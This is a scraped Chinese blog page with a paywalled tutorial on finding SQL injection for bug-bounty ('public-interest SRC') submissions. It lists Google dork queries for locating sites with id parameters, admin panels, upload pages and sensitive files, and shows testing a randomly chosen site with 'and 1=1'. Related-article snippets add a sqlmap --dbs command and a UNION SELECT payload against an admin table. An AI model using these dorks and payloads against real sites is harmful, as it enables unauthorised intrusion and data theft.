公益SRC实战|SQL注入漏洞攻略

已于 2023-11-22 10:21:44 修改
阅读量900 收藏 5
点赞数 2
CC 4.0 BY-SA版权
文章标签: sql 数据库
于 2023-11-15 15:10:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134418883
本文详细介绍了SQL注入漏洞的实战过程,包括信息收集、实战演示和使用sqlmap进行验证。通过谷歌语法搜索和实战操作,展示了如何发现并确认SQL注入点,以及如何利用sqlmap获取数据库信息。适合安全学习者作为SRC实战练习。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、信息收集

二、实战演示

三、使用sqlmap进行验证

四、总结

一、信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二、实战演示

1.谷歌语法搜索
inurl:php id=62
 

图片


随便点进一个带有id传参=62的网站,大概率存在SQL注入
 

图片


2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1

图片


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
 

图片

<

最低0.47元/天 解锁文章

200万优质内容无限畅学
zkzq
关注
web安全-理论+实战SQL注入漏洞
Coisini的博客
05-31 652
理论+实战SQL注入漏洞 (1433是Mssql端口) 基本语句: Select*from 表名 查询表内所有内容 CREATE DATABASE database-name 创建数据库 drop database dbname 删除数据库 调用代码 <% set conn =server.createobject(” adodb.connection”) conn.open...
sql注入漏洞简单讲解与实战
Lenovoliao的博客
04-10 2185
SQL注入SQL Injection)是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库发送恶意的SQL查询,从而绕过身份验证、获取敏感数据或者对数据库进行修改。SQL注入通常发生在与数据库交互的Web应用程序中,尤其是那些直接将用户输入拼接到SQL查询语句中的应用程序。攻击者利用SQL注入漏洞时,常常通过在输入字段中插入SQL代码来干扰、扩展或篡改原始SQL查询的执行。这种攻击可以使攻击者获得未经授权的数据访问权限,例如用户凭证、个人信息或者敏感业务数据。
SQL注入漏洞测试实战
weixin_47493074的博客
09-19 662
sqlmap小测试
SQL注入漏洞攻防实战代码演练
最新发布
weixin_28968525的博客
05-26 606
在本章节中,我们探讨了SQL注入潜在的危害,从数据安全到业务连续性,SQL注入带来的影响是多方面的。下一章节我们将讨论如何通过有效的防御策略来降低这些风险,保护组织的数据和业务不受攻击。
可怕的漏洞SQL注入漏洞实战演习
tangshuangsss的专栏
12-16 693
简介 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞(在最新的类型中:命令注入、代码注入、xss注入sql注入等已经合并统称注入漏洞)。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! 原理:SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 建议.
某网SQL注入漏洞实战
weixin_30578677的博客
04-23 258
root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs available databases [8]: [*] dntg [*] dntg2 [*] dnweb [*] information_schema [*] mysql [*] performance_schema [*] test ...
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5582
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
公益src漏洞挖掘
weixin_46865273的博客
04-17 1571
某制作业公司存在sql注入 判断字段数 为8个 语法order by 8 字段数为9 页面会发生报错 使用联合查询语句 发现有回显点 使用函数 database() 出现库名 用得到的库名查询表名 语法:union select 1,2,3,(group_concat(table_name)),5,6,7,8 from information_schema.tables where table_schema=‘XXXXXXXXX’ 得到25个表 选中admin表 查询里面的字段 获得7个字段 语法:
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
Power7089的博客
08-22 2541
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
记录一次公益SRC的常见的cookie注入漏洞(适合初学者)
hackzkaq的博客
10-11 289
1.谷歌语法找到注入点2.判断注入是否存在3.通过cookie绕过注入4.爆破表名5.偏移注入查找表的字段数6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限这次实战记录很适合新手小白挖SRC,希望多多支持!hack渗透视频教程,扫码免费领。
SQL漏洞注入(附实战练习)
Matheus的博客
05-15 6259
环境部署 phpstudy、DVWA、SQLI-LABS(学习sql注入平台)、upload-labs、课程源码环境web SQL注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞注入能力和对数据库安全的认识。
实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
刘书的IT博客
01-03 1942
前几天微软skype的官方博客网站被黑客突破,虽然很快进行了修复,但从网友截屏的图片来看,应该一些抗议美国国安局监听行为和反对微软在软件里隐藏后门的黑客所为。微软skype的官方博客使用的是WordPress平台,Wordpress目前是世界上最流行的博客平台,市场占有率高达70%,这次攻击事件虽然牵涉到wordpress,但并不能说明wordpress平台很脆弱,事实上脆弱的是wordpress
SQL注入实战
hxhabcd123的博客
08-28 2732
本文记录各种SQL注入类型的实操过程
记一次简单的渗透实战(手工SQL注入
qq_40467699的博客
09-17 1790
渗透场景: 本次测试网站 :www.gaoneng.com 该漏洞已经提交漏洞盒子平台,已授权公开此漏洞。 经过初步判断,得出此网站操作系统为Windows,网站源码脚本格式为php,使用的数据库类型为Mysql,架设环境为Windows Microsoft-IIS/6.0。 问题描述: 产生SQL注入的必备条件: 1.程序员未经检查或者未经充分检查的用户输入数据,意外变成了代码被执行。 2.有可利用控制输入的数据值 SQL注入漏洞的危害: 1.攻击者可以利用获得的数据进行读取服
记录某商城0元购和SQL注入漏洞
人若无名,便可专心练剑
10-15 995
哈喽,师傅们!这次给师傅们分享的是一个商城的0元购和SQL注入漏洞,写的还是蛮详细的,让师傅们都能够看的懂。这个零元购很多师傅都没有亲自去挖过,下面我给师傅们分享的案例,师傅们可以仔细看看,然后看完师傅们就可以多去那种商城测试下,然后打一波零元购,还有就是付款页面的前端校验,看看能不能通过bp进行一个绕过。支付漏洞是高风险漏洞也属于逻辑漏洞,通常是通过篡改价格、数量、状态、接口、用户名等传参,从而造成小钱够买大物甚至可能造成0元购买商品等等,凡是涉及购买、资金等方面的功能处就有可能存在支付漏洞
SQL注入漏洞过程实例及解决方案
weixin_44263292的博客
10-12 917
SQL注入漏洞过程实例及解决方案 主要介绍了SQL注入漏洞过程实例及解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 代码示例: public class JDBCDemo3 { public static void demo3_1(){ boolean flag=login(“aaa’ OR ’ “,“1651561”); //若已知用户名,用这种方式便可不用知道密码就可登陆成功 if (flag){ System.out.println(“登陆成
SQL注入漏洞利用
Kali与编程
12-10 1552
渗透测试工程师可以检查Web应用程序中的输入字段,例如用户提交的表单、URL参数和Cookie等,以确定是否存在潜在的注入点。作为渗透测试工程师,了解SQL注入漏洞的利用是非常重要的,因为它可以帮助您发现并利用目标Web应用程序中的漏洞SQL注入攻击的原理是利用了Web应用程序中的输入验证不充分,允许恶意用户将恶意代码注入SQL查询中的漏洞。如果我们将id参数设置为’ union select 1,2,3–,应用程序可能会返回一个包含3个列的结果集,其中第一列的值为1,第二列的值为2,第三列的值为3。
sql注入
qq_52108058的博客
11-03 1127
经过对表中字段的查询发现,该admin表有三个字段,id、username、password。发现有一个admin用户,在通过limit 1,1查询第二用户为空,则只有一个用户。(可以理解为从数据库提取的数据被显示在前端)可以在第二个字段处显示我们想要的内容。发现的第二个字段处为。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值